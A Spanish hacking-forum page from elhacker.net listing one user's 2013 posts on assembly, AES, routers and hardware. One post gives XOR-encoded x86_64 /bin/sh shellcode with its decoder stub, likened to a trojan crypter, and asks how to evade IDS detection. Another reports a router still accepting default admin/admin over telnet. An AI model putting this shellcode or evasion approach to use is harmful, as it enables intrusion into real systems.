elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


  Mostrar Temas
Páginas: 1 2 3 [4] 5 6 7
31  Programación / ASM / Rotar en registros XMM en: 16 Agosto 2013, 16:50 pm
Hola

Pues eso me gustaria rotar un byte en los cuatro doublewords que tiene un registro XMM. Hay una instruccion llamada vprotd pero no dispongo de la bandera XOP.

Como podria hacer ese tipo de rotacion, lo mas eficiente posible. Este es lo que pretendo.

Código
  1. 0x63cab704ffed010408040cffee4488dd  rot 1 ----> 0xcab70463ed0104ff040cff084488ddee

Un saludo.
32  Seguridad Informática / Bugs y Exploits / [!] Encode XOR /bin/sh x86_64 en: 6 Agosto 2013, 19:03 pm
Hola

Como no hay muchos temas de estos en el foro les dejo este aporte, se trata de la tipica execve /bin/sh. No esta testeada ya que utilizo OpenBSD y no puedo ejecutar nada desde la memoria, para la Linux cambien el numero de la syscall, tendria que funcionar.

Este codigo lo cree para poner en practica mis conocimientos, si alguien da un mal uso es su problema, no soy responsable.

Código
  1. "\xeb\x0c\x5e\x46\x31\x24\x8e\x41\xfe\xc9\x75\xf7\xff\xe6"
  2. "\x41\xb1\x06\x4d\x31\xe4\x41\xff\xcc\xe8\xe6\xff\xff\xff"
  3. "\xb7\x44\xe8\x4e\xcb\x48\x68\xc6\xcb\x7f\xb7\x2e\x3c\xac"
  4. "\xab\xa0\xb7\xce\x3f\xaf\xab\xa1\xb7\x66\x4f\xc4\xf0\xfa";

Este es el Encode.

Código
  1. _start:
  2.  
  3. jmp _C.2
  4.  
  5. _C.0:
  6.  
  7. popq %rsi
  8.  
  9. _C.1:
  10.  
  11. xorl %r12d, (%rsi, %r9, 4)
  12. decb %r9b
  13. jnz _C.1
  14. jmp *%rsi
  15.  
  16. _C.2:
  17.  
  18. movb $0x6, %r9b
  19. xorq %r12, %r12
  20. decl %r12d
  21. call _C.0

Como pueden observar es casi identico por no decir que es completamente identico al de un crypter de un troyano o malware similar. Tengo bastantes ideas de como mejorar el cifrado, si alguien se anima que lo comente, y cualquier pregunta sobre el codigo ya saben.

Un saludo.

P.D: Alguien sabe cuales son los opcodes que detecta un IDS? Por ejemplo se que Snort detecta los NOP y /bin/sh.
33  Informática / Electrónica / Duda inhibidores en: 2 Agosto 2013, 10:43 am
Hola

Bueno lo primero de todo es que no se piensen que quiero cometer un delito, simplemente es curiosidad.
Estaba mirando estos dispositivos y me parecen muy interesantes, he mirado el funcionamiento, operan a la misma frecuencia que el dispositivo a inhibir pero con una potencia de onda mayor.

Mi pregunta es la siguiente.

Si mi router funciona en la frecuencia 2,4 Ghz a unos 200 mW, y tengo una tarjeta que funciona a la misma frecuencia pero a 1 W no se podria inhibir ese router?

Un saludo.
34  Comunicaciones / Redes / Problema con router del ISP. en: 27 Julio 2013, 10:18 am
Hola

Me gustaria saber de alguien que tenga un router Huawei modelo hg532c del ISP Jazztel, ya que tengo un problema y no se si es fallo mio o del router.

Un saludo.



Bueno, ya probe lo mismo en otro router del mismo modelo pero de otro operador, en este caso Orange y tiene el mismo problema, que es el siguiente.

Cuando entro a traves del puerto 80, ya saben por el navegador, el router pide un usuario y pass, que en este caso por default es admin admin, bueno como ya sabran esos valores se tienen que cambiar ya que si no es un fallo muy grave de seguridad. Cambio la pass en el apartado de mantenimiento y todo bien, al ingresar de nuevo la pass admin no es valida. Pero resulta que aparte utilizo OpenBSD y no tengo entorno grafico asi que utilizo telnet para entrar al router, si aun hay gente que utiliza telnet, ingresas a una terminal con el siguiente mensaje.


Código:
-------------------------------
-----Welcome to ATP Cli------
-------------------------------

Vamos la terminal de todo la vida, y como es normal pide el user y la pass, pues hay esta el problema pruebo la pass que cambie anteriormente y no la accepta pero el admin admin si funciona, y puedo entrar a la consola ATP y a busybox. Eso en los dos router que probe uno de Jazztel y el otro de Orange, alguien tiene ese modelo para corroborar esto?

Es un fallo de seguridad o es que no configure bien el router?

Un saludo.
35  Seguridad Informática / Criptografía / Multiplicacion AES en: 23 Julio 2013, 03:35 am
Hola

Estoy leyendo el fips-197, y tengo un problema con el siguiente polinomio.

(x^6 + x^4 + x^2 + x + 1) (x^7 + x + 1) modulo (x^8 + x^4 + x^3 + x + 1) = x^7 + x^6 + 1


Entiendo todos lo ejemplos, pero no se muy bien como implementar el modulo, mi resulatdo es erroneo.

Un saludo.
36  Programación / ASM / Comandos puertos I/O en: 4 Julio 2013, 11:05 am
Hola

En un tema anterior hable de como obtener valores del teclado a traves del puerto de entrada.
Ahora me gustaria intentar comunicarme con algun dispositivo mas complejo, pero el problema es que no se que comandos enviar o como comunicarme con el.

Aqui estan los del teclado y el raton.

Código:
http://www.win.tue.nl/~aeb/linux/kbd/scancodes-11.html

Tendra que a ver algo parecido para los distintos dispositivos no?

Unos cuantos dispositivos y sus puertos que saque de ioport.

Código:
1000-1003 : ACPI PM1a_EVT_BLK
1004-1005 : ACPI PM1a_CNT_BLK
1008-100b : ACPI PM_TMR
1010-1015 : ACPI CPU throttle
1020-1020 : ACPI PM2_CNT_BLK
1028-102f : ACPI GPE0_BLK
4000-40ff : 8139too
4400-44ff : PCI CardBus 0000:07
4800-48ff : PCI CardBus 0000:07
5000-5fff : PCI Bus 0000:02

Me interesan todos pero el que mas es 8139too, es el dispositivo ethernet. Cualquier ayuda es bienvenida.

Y ya que estoy les pregunto esto, se puede construir un paquete ya sea TCP, ICMP, UDP y enviarlo a traves del puerto ethernet, como la API send, connect etc...

Un saludo.

P.D: Siento las faltas de ortografia, teclado distinto.
37  Seguridad Informática / Análisis y Diseño de Malware / Sniffer a bajo nivel en: 31 Mayo 2013, 21:02 pm
Hola

Estaba leyendo en los tomos de intel las instrucciones in y out que son capaces de leer y escribir en los puertos I/O, e visto códigos que leen caracteres del teclado.

La pregunta es esta espero que no sea muy tonta.

Se podría leer el tráfico que pasa por el dispositivo ethernet a traves de su puerto con esas instrucciones?

Creo que este es su puerto.

Código:
0x0010: BAR io addr: 0x0000de00/0x0100

Un saludo.
38  Programación / ASM / Puertos I/O en: 16 Mayo 2013, 15:17 pm
Hola

Citar
it0 at isa0 port 0x2e/2: IT8720F rev 8, EC port 0x228

Es el sensor de temperatura.

Tengo el siguiente código:

Código
  1. movb $0x2e, %dl ; movw $0x228, %dx
  2. in %dx, %eax

El resultado es un core dumped, que estoy haciendo mal?

Un saludo.

39  Programación / ASM / Memoria superior en: 6 Mayo 2013, 11:58 am
Hola

Empiezo con un ejemplo.

Código
  1. pop rsi  // envp
  2. pop rsi  // argv
  3. pop rsi  // argc

Seria la forma de mirar los valores de esos argumentos.

El siguiente código que encontre pasa la estructura icmp_hdr.

Código:
; fix up ttl (optional?! make sure its high!)
 ; mov   [ebp+8], byte 0ffh

 ; switch ip's
 mov   ecx, [ebp+12]
 xchg  [ebp+16], ecx
 mov   [ebp+12], ecx

 ; set icmp type to echo reply (optional?!)
 ;mov   [ebp+20], word zero_reg_w
 ; zero checksum
 ;mov   [ebp+22], word zero_reg_w
 ; set icmp type to echo and zero checksum
 mov   [ebp+20], zero_reg

 lea   ecx, [zero_reg+117]
 lea   esi, [ebp+20]

Esta escribiendo en argv y en envp, no lo entiendo, alguien puede ayudarme?

Un saludo.
40  Informática / Hardware / AM3+ en socket AM3 en: 1 Mayo 2013, 02:49 am
Hola

Pues lo dicho, me gustaría instalar un zambei en un socket am3, e estado leyendo artículos que dicen que se puede si actualizas la bios. Pero creo que no hay soporte para mi placa base GA-890FXA-UD5.

No quiero montar nada serio con un FX-4100 es más que suficiente.

¿Qué pasaría si lo colocara sin esa actualización?

Un saludo.
Páginas: 1 2 3 [4] 5 6 7
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines